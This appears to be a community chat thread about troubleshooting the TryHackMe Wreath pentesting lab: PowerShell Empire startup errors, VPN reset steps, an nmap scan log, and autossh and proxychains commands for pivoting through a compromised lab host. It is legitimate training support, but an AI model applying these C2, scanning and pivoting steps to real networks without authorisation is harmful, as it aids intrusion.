[INFO]: v2: Loading bypasses from: /usr/share/powershell-empire/empire/server/bypasses 
[INFO]: v2: Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles 
[INFO]: v2: Loading modules from: /usr/share/powershell-empire/empire/server/modules 
[INFO]: Searching for plugins at /usr/share/powershell-empire/empire/server/plugins 
[INFO]: Initializing plugin: Basic Reporting 
[INFO]: Starkiller enabled. Loading. 
[INFO]: Starkiller served at the same ip and port as Empire Server 
[INFO]: Starkiller served at http://localhost:1337/ 
[INFO]: Started server process [7582] 
[INFO]: Waiting for application startup. 
[INFO]: Application startup complete. 
[INFO]: Uvicorn running on http://0.0.0.0:1337 (Press CTRL+C to quit)
server>

but I dont get the server CLI, and also, when I run :
sudo powershell-empire client I get an error:

┌──(kali㉿kali)-[~/Empire-Cli]
└─$ sudo powershell-empire client
usage: empire.py [-h] {server,setup} ...
empire.py: error: argument subparser_name: invalid choice: 'client' (choose from server, setup)

what do I do?

Hi there, I'm trying to get socat working in steps 19/20 just for practice. Has anyone been successful using socat here? I keep spinning my wheels, just want to confirm it's me. Thanks!

Hi There. I am not able to connect to wreath even with attack box

several options, but to start fresh I suggest you do the following in the order:

• terminate THM AttackBox
• use the Options button to leave the room
• wait a few minutes to join the room again
• make sure the Wreath network is running
• start THM AttackBox

The wreath network is not working on the attack box
I already tried to reset the network, reset the room and leave the room and of course restart the attack box
But I just cant ping to 10.200.180.200
before a few weeks I remember it did worked

I tried nmap with -Pn but it return useless data so maybe it is not really up:

nmap -p-15000 -vv 10.200.180.200 -oG initial-scan -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-25 20:04 BST
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating SYN Stealth Scan at 20:04
Scanning thomaswreath.thm (10.200.180.200) [15000 ports]
Nmap scan report for thomaswreath.thm (10.200.180.200)
Host is up, received user-set.
All 15000 scanned ports on thomaswreath.thm (10.200.180.200) are filtered because of 15000 no-responses

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3004.14 seconds
Raw packets sent: 30000 (1.320MB) | Rcvd: 15 (520B)

to get it fixed, just do the steps listed in the message just above

reset the progress
leave room
wait 4 - 6 minutes
join again
wait 6 - 7 minutes
go to access page -> networks -> select wreath v2
hit regenerate
download and connect to vpn
ping the ip you've been given in THM
if ping works, then youre golden, if not, do all of that again 1 through 10.

reset the progress
leave room
wait 4 - 6 minutes
join again
wait 6 - 7 minutes
go to access page -> networks -> select wreath v2
hit regenerate
download and connect to vpn
ping the ip you've been given in THM
if ping works, then youre golden, if not, do all of that again 1 through 10.

Hey guys, I just finished the wreath room, do I vote for a reset?

The VPN file for wreath is so unreliable

sometimes it works and then 85% of the time it doesn't

are you using the v2 VPN file?

Yes, and sometimes that won’t even generate on the site

I suggest you leave the room and join back a few minutes later: you will land on new instance with different IPs
then regenerate the VPN file and try again

Alright, I’ve tried that before and it didn’t do much but I’ll give it another shot

Thanks

Now it seems like most of the networks aren't showing up on THM, and I can't access hints

I used to use THM all the time why does it seem so buggy now

I'm also unable to sV scan through nmap with a proxy up? Here are some screenshots:

Please let me know what I'm doing wrong here

@opal sky I finished Wreath a couple of weeks ago, but it was very unstable. I'm not sure if it'll be helpful but... checking my notes, I used autossh to stabilize my general SSH connection:

sudo apt install -y autossh
autossh -M 0 -o "ServerAliveInterval 15" -o "ServerAliveCountMax 3" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 -i target_id_rsa root@$TARGET

Had to wait for it come back sometimes, but it would autoconnect.

For nmap, I uploaded a static nmap to the first hop server for basic scanning (since it'll lack the scripts). proxychains nmap seemed to work for me thru my autossh connection if you want full -sC features. I don't see where your nmap command is using the proxy... also your sshuttle can't find the keyfile

The network could be off. I did have to take a full day off Wreath because it wouldn't cooperate. Maybe took me 3-4 days given how bad the network was. Best of luck

Thank you!!

Fwiw, the network itself is fine provided no one's been a dick and messed an instance up for everyone else.

The supporting infrastructure seems to have been left to rot for a while now though. Kinda sad to see 🙁
That was a big project once upon a time.

Lol my Red Team Manager LOVES Wreath, recommends it to learn proper pentesting networks instead of just popping boxes. Hopefully it can get a little infra revamp at some point.

We have migrated to v2 network here, which has improved stability significantly. Also means that all networks have exactly the same IPs and subnets, which further helps with stability.

That being said, the VMs themselves probably need a bit of a refresher and update. That is the future plan for all networks, just finding time to get to it has been hard.

Update, I finally got proxychains to actually do something. It's weird, because I HAVE to run it with sudo, and I have to include -Pn. I expected the pn flag due to the icmp limitations, but I did not expect it to require sudo. Thanks for your help again!

Gave +1 Rep to @open elk (current: #3231 - 1)

Now that is good to hear, thank you ♥️

Any idea why so many people still seem to be having stability problems? Would definitely be nice to let the VMs update to get rid of unintended paths, but they're golden images which worked fine at release. They shouldn't have changed since.

Gave +1 Rep to @soft loom (current: #33 - 336)

The latest stability issues is on me. With the v2 migration I made some mistakes with the VPN profiles. But all of those should have been resolved now (still testing).

A big issue is users not connecting to the VPN correctly or using tryconnectme to debug the connection from the attackbox. Also, for YEARS users have been told if something goes wrong, leave the network and join another one, leading to them not debugging but rather taking the exit route until it works. But with v2 networks, all subnets are the same, so years of that now needs to be de-learned. Which is going to take some time.

You are right, nothing in the golden images changed, so should not be an issue. But I have come to see interesting pesky time-based issues creep in, such as:

• User accounts expiring
• AD certificates expiring

These can break the images over time, requiring a refresh then

At least with v2 networks, we can now actually refresh these images ourselves. No need for backend access anymore, so the refreshes themselves are easier

Wreath doesn't have any AD 😄
I seem to remember putting an autogen in for the prod webserver certificate as well, although that may have broken if someone made changes and cloned without resetting it.

Yeah, wreath doesn't have this issue but all my AD networks does 😅 So fun times. But yeah, now that all networks are v2, can actually start pushing patches to all of them. We are also in the process of revamping all AD content, so that will be good as well!

Hello, I have tried 4 times your steps already - is there anything that I am missing? I have the same issue and been trying for a couple of hours back and forth now. Had a look in other solutions here, but nothing seems to be working so hence the direct reply to this post 🙁

make sure you use use the v2 VPN file for Wreath
if you use THM AttackBox, I suggest you troubleshoot access to the network by running the tryconnectme command

hihi i can't seem to access openvpn wreathv2 coz of cipher issues

can anyone help

i alrdy changed the ciphers in the config file according to instructions but wldn't work

i followed these steps but still cldn't ping the ip in THM Wreath network